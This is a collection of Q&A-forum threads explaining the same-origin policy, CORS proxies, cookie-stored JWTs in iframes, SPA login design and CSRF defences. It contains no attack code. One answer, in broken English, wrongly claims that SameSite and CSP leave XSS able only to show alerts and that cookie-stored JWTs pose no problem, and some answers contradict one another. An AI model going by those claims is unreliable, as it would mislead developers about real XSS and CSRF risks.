Why do browsers apply the same origin policy to XMLHttpRequest? It's really inconvenient for developers, but it appears it does little in actually stopping hackers.
There are workarounds, they can still include javascript from outside sources (the power behind JSONP).
It seems like an outdated "feature" in a web that's largely interlinked.
Because an XMLHttpRequest passes the user's authentication tokens. If the user were logged onto example.com with basic auth or some cookies, then visited attacker.com, the latter site could create an XMLHttpRequest to example.com with full authorisation for that user and read any private page that the user could (then forward it back to the attacker).
Because putting secret tokens in webapp pages is the way to stop simple Cross-Site-Request-Forgery attacks, this means attacker.com could take any on-page actions the user could at example.com without any consent or interaction from them. Global XMLHttpRequest is global cross-site-scripting.
(Even if you had a version of XMLHttpRequest that didn't pass authentication, there are still problems. For example an attacker could make requests out to other non-public machines on your intranet and read any files it can download from them which may not be meant for public consumption. <script> tags already suffer from a limited form of this kind of vulnerability, but the fully-readable responses of XMLHttpRequest would leak all kinds of files instead of a few unfortunately-crafted ones that can parse as JavaScript.)
Related
I have a product that requires sign-in authentication. I use jwt but store that inside cookies (which I know could be a problem once there is an xss vulnerability).
This product is also given to some "other domains" that embed it through an iframe.
I'm curious if there are any security risks that I did not think about in this situation.
E.g. Does the parent, "other domain", have access to my authentication tokens since I use cookies to store my JWT tokens? If the parent has xss vulnerability, then this would automatically imply a vulnerability for me as well?
I have a product that requires sign-in authentication. I use jwt but store that inside cookie (which I know could be a problem once there is an XSS vulnerability)
Storing in Cookie is not a problem Now By using some headers Like sameSite and CSP it is even harder To exploit XSS They can Pop-up alert box but they cannot steal cookies though it gives You the confidence To use it It really depends On How You code a functionality. If you are using frameWorks(like- Jinja, Vue, angular, ejs..etc) There is a very low chance to Attacker To inject code.
This product is also given to some "other domains" that embed it through an iframe
If the parent Domain Having an XSS. then Probably The iFrame also affected To XSS. They Can see the content and send It there domain or There is a Tool called xsshunter.io You can check By testing IT on a Development server. But if You use CSP and Same-site: Lax then it's Not a problem there will be no communication to External Domain other than the Whitelist domain.
If it's vertical privilege From child to parent Then You have a great feature Called sandbox in the iframe.
(no value) Applies all restrictions
allow-forms Allows form submission
allow-modals Allows to open modal windows
allow-orientation-lock Allows to lock the screen orientation
allow-pointer-lock Allows to use the Pointer Lock API
allow-popups Allows popups
allow-popups-to-escape-sandbox Allows popups to open new windows without inheriting the sandboxing
allow-presentation Allows to start a presentation session
allow-same-origin Allows the iframe content to be treated as being from the same origin
allow-scripts Allows to run scripts
allow-top-navigation Allows the iframe content to navigate its top-level browsing context
allow-top-navigation-by-user-activation Allows the iframe content to navigate its top-level browsing context, but only if initiated by the user
it is good Practice To Use JWT in headers But there is No problem At all using It in cookies But using JWt in headers is more secure.
Hope This Help's You!
I've read an article which used Cors-Anywhere to make an example url request, and it made me think about how easily the Same Origin Policy can be bypassed.
While the browser prevents you from accessing the error directly, and cancels the request altogether when it doesn't pass a preflight request, a simple node server does not need to abide to such rules, and can be used as a proxy.
All there needs to be done is to append 'https://cors-anywhere.herokuapp.com/' to the start of the requested url in the malicious script and Voila, you don't need to pass CORS.
And as sideshowbarker pointed out, it takes a couple of minutes to deploy your own Cors-Anywhere server.
Doesn't it make SOP as a security measure pretty much pointless?
The purpose of the SOP is to segregate data stored in browsers by their origin. If you got a cookie from domain1.tld (or it stored data for you in a browser store), Javascript on domain2.tld will not be able to gain access. This cannot be circumvented by any server-side component, because that component will still not have access in any way. If there was no SOP, a malicious site could just read any data stored by other websites in your browsers.
Now this is also related to CORS, as you somewhat correctly pointed out. Normally, your browser will not receive the response from a javascript request made to a different origin than the page origin it's running on. The purpose of this is that if it worked, you could gain information from sites where the user is logged in. If you send it through Cors-Anywhere though, you will not be able to send the user's session cookie for the other site, because you still don't have access, the request goes to your own server as the proxy.
Where Cors-Anywhere matters is unauthenticated APIs. Some APIs might check the origin header and only respond to their own client domain. In that case, sure, Cors-Anywhere can add or change CORS headers so that you can query it from your own hosted client. But the purpose of SOP is not to prevent this, and even in this case, it would be a lot easier for the API owner to blacklist or throttle your requests, because they are all proxied by your server.
So in short, SOP and CORS are not access control mechanisms in the sense I think you meant. Their purpose is to prevent and/or securely allow cross-origin requests to certain resources, but they are not meant to for example prevent server-side components from making any request, or for example to try and authenticate your client javascript itself (which is not technically possible).
My understanding is that, if you include your login page in your SPA, then the user is receiving all of your code before they're even authenticated. And yet, it seems to be a very common practice. Isn't this incredibly insecure?? Why or why not?
An SPA would have all the page structures (html and javascript code for the design of pages), but obviously not data. Data would be downloaded in subsequent ajax requests, and that is the point. To download actual data, a user would have to be authenticated to the server, and all security would then be implemented server-side. An unauthorized user should not be able to access data from the server. But the idea is that how pages look is not a secret, anybody can have a look at pages of the SPA without data, and that's fine.
Well, and here comes the catch that people often overlook. Html is one thing, but there is all the javascript in an SPA that can access all the data. Basically the code of the SPA is an API documentation if you like, a list of possible queries that the backend can handle. Sure, it should all be secure server-side, but that's not always the case, people make mistakes. With such a "documentation" that an SPA is, it can be much easier for an attacker to evaluate server-side security and find authorization / access-control flaws in server-side code which may enable access to data that should not be accessible to the attacker.
So in short, having access to how pages look (without data) should be ok. However, giving away how exactly the API works can in certain scenarios help an attacker, and therefore adds some risk, which is inherent to SPAs.
It must be noted though that it should not matter. As security by obscurity should not be used (ie. it should not be a secret how things work, only things like credentials should be secrets), it should be fine to let anyone know all the javascript, or the full API documentation. However, the real world is not always so idealistic. Often attackers don't know how stuff works, and it can be of real help to be able to for example analyze an SPA, because people that write the backend code do make mistakes. In other cases the API is public and documented anyway, in which case having an SPA presents no further risk.
If you put the SPA behind authentication (only authenticated users can download the SPA code), that complicates CDN access a lot, though some content delivery networks do support some level of authentication I think.
Yet there is a real benefit of having a separate (plain old html) login page outside the SPA. If you have the login page in the SPA, you can only get an access token (session id, whatever) in javascript, which means it will be accessible to javascript, and you can only store it in localStorage, or a plain non-httpOnly cookie. This may easily result in the authentication token being stolen via cross-site scripting (XSS). A more secure option is to have a separate login page, which sets the authentication token as a httpOnly cookie, inaccessible to any javascript, and as such, safe from XSS. Note though that this brings the risk of CSRF, which you wil lhave to deal with then, as opposed to the token/session id being sent as something like a request header.
In many cases, having the login in the SPA and storing the authentication token in localStorage is acceptable, but this should be an informed decision, and you should be aware of the risk (XSS, vs CSRF in the other case).
It's clear that data loaded into an SPA must be secured behind an API through authn. But I think you can also secure layout so it is "less ok" having access to how pages look. With metamodel-driven development, you can serve layout configuration from a secured API. I am not talking about serving HTML (that's SSR), I am talking about serving JSON. That layout configuration is nothing but a JSON file on the server defining the content of your screen (fully or partially). Then your SPA code turns into a generic interpreter/render of that metamodel that parses the payload, renders components and binds data. If your API is L3, voilà, you get a fully working API-driven app.
Is CSRF possible with PUT or DELETE methods? Or does the use of PUT or DELETE prevent CSRF?
Great question!
In a perfect world, I can't think of a way to perform a CSRF attack.
You cannot make PUT or DELETE requests using HTML forms.
Images, Script tags, CSS Links etc all send GET requests to the server.
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets will block cross-domain requests.
So, in general, it shouldn't be possible to make a CSRF attack to a resource that supports PUT/DELETE verbs.
That said, the world isn't perfect. There may be several ways in which such an attack can be made possible :
Web Frameworks such as Rails have support for "pseudo method". If you put a hidden field called _method, set its value to PUT or DELETE, and then submit a GET or POST request, it will override the HTTP Verb. This is a way to support PUT or DELETE from browser forms. If you are using such a framework, you will have to protect yourself from CSRF using standard techniques
You may accidentally setup a lax response headers for CORS on your server. This would allow arbitrary websites to make PUT and DELETE requests.
At some point, HTML5 had planned to include support for PUT and DELETE in HTML Forms. But later, they removed that support. There is no guarantee that it won't be added later. Some browsers may actually have support for these verbs, and that can work against you.
There may just be a bug in some browser plugin that could allow the attacker to make PUT/DELETE requests.
In short, I would recommend protecting your resources even if they only support PUT and DELETE methods.
Yes, CSRF is possible with the PUT and DELETE methods, but only with CORS enabled with an unrestrictive policy.
I disagree with Sripathi Krishnan's answer:
XmlHttpRequest and browser plugins such as Flash/Silverlight/Applets
will block cross-domain requests
Nothing stops the browser from making a cross-domain request. The Same Origin Policy does not prevent a request from being made - all it does is prevent the request from being read by the browser.
If the server is not opting into CORS, this will cause a preflight request to be made. This is the mechanism that will prevent a PUT or DELETE from being used, because it is not a simple request (the method needs to be HEAD, GET or POST). Assuming a properly locked down CORS policy of course (or none at all which is secure by default).
No. Relying on an HTTP verb is not a way to prevent a CSRF attack. It's all in how your site is created. You can use PUTs as POSTs and DELETEs as GETs - it doesn't really matter.
To prevent CSRF, take some of the steps outlined here:
Web sites have various CSRF countermeasures available:
Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the
right token in its submissions1
Requiring the client to provide authentication data in the same HTTP Request used to perform any operation with security
implications (money transfer, etc.)
Limiting the lifetime of session cookies Checking the HTTP Referer header or(and)
Checking the HTTP Origin header[16]
Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls[17]
Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies[18]
Verifying that the request's header contains a X-Requested-With. Used by Ruby on Rails (before v2.0) and Django (before v1.2.5).
This protection has been proven unsecure[19] under a combination of
browser plugins and redirects which can allow an attacker to
provide custom HTTP headers on a request to any website, hence
allow a forged request.
In theory it should not be possible as there is no way to initiate a cross-domain PUT or DELETE request (except for CORS, but that needs a preflight request and thus the target site's cooperation). In practice I would not rely on that - many systems have been bitten by e.g. assuming that a CSRF file upload attack was not possible (it should not be, but certain browser bugs made it possible).
CSRF is indeed possible with PUT and DELETE depending on the configuration of your server.
The easiest way to think about CSRF is to think of having two tabs open in your browser, one open to your application with your user authenticated, and the other tab open to a malicious website.
If the malicious website makes a javascript request to your application, the browser will send the standard cookies with the request, thus allowing the malicious website to 'forge' the request using the already authenticated session. That website can do any type of request that it wants to, including GET, PUT, POST, DELETE, etc.
The standard way to defend against CSFR is to send something along with the request that the malicious website cannot know. This can be as simple as the contents of one of the cookies. While the request from the malicious site will have the cookies sent with it, it cannot actually access the cookies because it is being served by a different domain and browser security prevents it from accessing the cookies for another domain.
Call the cookie content a 'token'. You can send the token along with requests, and on the server, make sure the 'token' has been correctly provided before proceeding with the request.
The next question is how do you send that value with all the different requests, with DELETE specifically difficult since it is not designed to have any kind of payload. In my opinion, the cleanest way is to specify a request header with the token. Something like this x-security-token = token. That way, you can look at the headers of incoming requests, and reject any that are missing the token.
In the past, standard ajax security restricted what could be done via ajax on the malicious server, however, now-a-days, the vulnerability depends on how you have your server set up with regards to accees-control configurations. Some people open up their server to make it easier to make cross domain calls or for users to make their own RESTful clients or the like, but that also makes it easier for a malicious site to take advantage unless CSRF prevention methods like the ones above are put in place.
What changes to the HTTP protocol spec, and to browser behaviour, would be required to prevent dangerous cases of cross-site request forgery?
I am not looking for suggestions as to how to patch my own web app. There are millions of vulnerable web apps and forms. It would be easier to change HTTP and/or the browsers.
If you agree to my premise, please tell me what changes to the HTTP and/or browser behaviour are needed. This is not a competition to find the best single answer, I want to collect all the good answers.
Please also read and comment on the points in my 'answer' below.
Roy Fielding, author of the HTTP specification, disagrees with your opinion, that CSRF is a flaw in HTTP and would need to be fixed there. As he wrote in a reply in a thread named The HTTP Origin Header:
CSRF is not a security issue for the Web. A well-designed Web
service should be capable of receiving requests directed by any host,
by design, with appropriate authentication where needed. If browsers
create a security issue because they allow scripts to automatically
direct requests with stored security credentials onto third-party
sites, without any user intervention/configuration, then the obvious
fix is within the browser.
And in fact, CSRF attacks were possible right from the beginning using plain HTML. The introduction of nowadays technologies like JavaScript and CSS did only introduce further attack vectors and techniques that made request forging easier and more efficient.
But it didn’t change the fact that a legitimate and authentic request from a client is not necessarily based on the user’s intention. Because browsers do send requests automatically all the time (e. g. images, style sheets, etc.) and send any authentication credentials along.
Again, CSRF attacks happen inside the browser, so the only possible fix would need to be to fix it there, inside the browser.
But as that is not entirely possible (see above), it’s the application’s duty to implement a scheme that allows to distinguish between authentic and forged requests. The always propagated CSRF token is such a technique. And it works well when implemented properly and protected against other attacks (many of them, again, only possible due to the introduction of modern technologies).
I agree with the other two; this could be done on the browser-side, but would make impossible to perform authorized cross-site requests.
Anyways, a CSRF protection layer could be added quite easily on the application side (and, maybe, even on the webserver-side, in order to avoid making changes to pre-existing applications) using something like this:
A cookie is set to a random value, known only by server (and, of course, the client receiving it, but not a 3rd party server)
Each POST form must contain a hidden field whose value must be the same of the cookie. If not, form submission must be prevented and a 403 page returned to the user.
Enforce the Same Origin Policy for form submission locations. Only allow a form to be submitted back to the place it came from.
This, of course, would break all sorts of other things.
If you look at the CSRF prevention cheat sheet you can see that there are ways of preventing CSRF by relying upon the HTTP protocol. A good example is checking the HTTP referer which is commonly used on embedded devices because it doesn't require additional memory.
However, this is weak form of protection. A vulnerability like HTTP response splitting on the client side could be used to influence the referer value, and this has happened.
cookies should be declared 'local' (default) or 'remote'
the browser must not send 'local' cookies with a cross-site request
the browser must never send http-auth headers with a cross-site request
the browser must not send a cross-site POST or GET ?query without permission
the browser must not send LAN address requests from a remote page without permission
the browser must report and control attacks, where many cross-site requests are made
the browser should send 'Origin: (local|remote)', even if 'Referer' is disabled
other common web security issues such as XSHM should be addressed in the HTTP spec
a new HTTP protocol version 1.2 is needed, to show that a browser is conforming
browsers should update automatically to meet new security requirements, or warn the user
It can already be done:
Referer header
This is a weaker form of protection. Some users may disable referer for privacy purposes, meaning that they won't be able to submit such forms on your site. Also this can be tricky to implement in code. Some systems allow a URL such as http://example.com?q=example.org to pass the referrer check for example.org. Finally, any open redirect vulnerabilities on your site may allow an attacker to send their CSRF attack through the open redirect in order to get the correct referer header.
Origin header
This is a new header. Unfortunately you will get inconsistencies between browsers that support it and do not support it. See this answer.
Other headers
For AJAX requests only, adding a header that is not allowed cross domain such as X-Requested-With can be used as a CSRF prevention method. Old browsers will not send XHR cross domain and new browsers will send a CORS preflight instead and then refuse to make the main request if it is explicitly not allowed by the target domain. The server-side code will need to ensure that the header is still present when the request is received. As HTML forms cannot have custom headers added, this method is incompatible with them. However, this also means that it protects against attackers using an HTML form in their CSRF attack.
Browsers
Browsers such as Chrome allow third party cookies to be blocked. Although the explanation says that it'll stop cookies from being set by a third party domain, it also prevent any existing cookies from being sent for the request. This will block "background" CSRF attacks. However, those that open full page or in a popup will succeed, but will be more visible to the user.